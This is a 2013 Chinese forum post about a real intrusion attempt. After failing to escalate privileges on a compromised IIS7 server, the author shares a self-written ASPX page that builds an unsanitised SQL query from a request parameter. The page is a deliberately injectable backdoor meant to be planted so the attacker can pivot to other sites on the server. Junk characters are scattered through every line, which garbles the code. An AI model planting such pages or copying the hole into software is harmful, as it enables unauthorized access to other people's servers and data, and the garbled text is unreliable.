昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。3 u% `6 @, n- \3 \; b
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
! ?) t7 k8 _- N. f5 \5 c$ j代码量不多,自己写个拉倒了。烦死了。3 m6 a) A4 W) C* I9 P9 ~( x
: [- W. ?7 \- u* x8 q9 y3 D1 v8 r+ c9 A- {
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
! @! J- f- j1 x& y5 e, R& j9 Z<html xmlns="http://www.w3.org/1999/xhtml">
8 k& |) S ^# b8 t' Q* H<head runat="server">
6 l7 g- j" z- w- j <title>暗影aspx构造注射专用页面</title>; r& H" d. i6 U+ P: G: `# g
</head>
2 x& ?. N# S. L6 S- K0 f<body>+ K# A0 \! n3 W) G/ o1 W
<form id="form1" runat="server">
: V5 o: u% _# g) W1 n# q! `; l. d <div>
; W6 w2 k9 p6 ?3 \ w( t <script language="c#" runat="server">
) y$ }! ~% e! J @# x7 k i
/ w# W8 ^ E1 e1 ^4 m; K2 E void page_init(object sender, EventArgs e)) @# B4 y& |1 Y! e
{
3 L% y7 p3 L' t: {1 \( c) l 1 k# n- I8 B5 d% S2 n
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
! B! I0 l9 F+ J, G5 H1 R
# C" g8 D3 o- h5 a1 x { conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
# l; |8 R9 E2 E* E! _: V' @2 M conn.Open();
' D4 j0 a2 p) V+ w. B8 K7 Q8 j : G' L7 Y' n! y% @/ E
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1 ]8 p) J! J+ |3 v% D
# K/ f4 X5 |- J' P& a j
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);' C. R- {! p* s3 O( y9 j; h# c8 ~
int x = command.ExecuteNonQuery();
8 w+ S! n+ F( {9 d) N9 f5 r8 E Response.Write(i+"\n");. [ Q* ?9 u3 b3 u0 J
Response.Write(x);4 W: a# u# c& e, T
conn.Close();
t- M' Y/ n6 G5 `: Q5 s* o }. a; g# S/ G" P) `
/ ^( \9 d/ i' J3 ^1 P( B; }0 C' H
</script>
' R: U8 k8 _3 a; Z </div>. f- K9 e0 b$ W
</form>" Q1 Q% G3 T7 t- e5 \
</body>( \9 T" P- y' r1 }) v# v9 S- B' X
</html>
3 G- t$ R" R0 Z# r% r# `' e' t6 m |
发表于 2013-3-20 21:32:01
收藏
支持
反对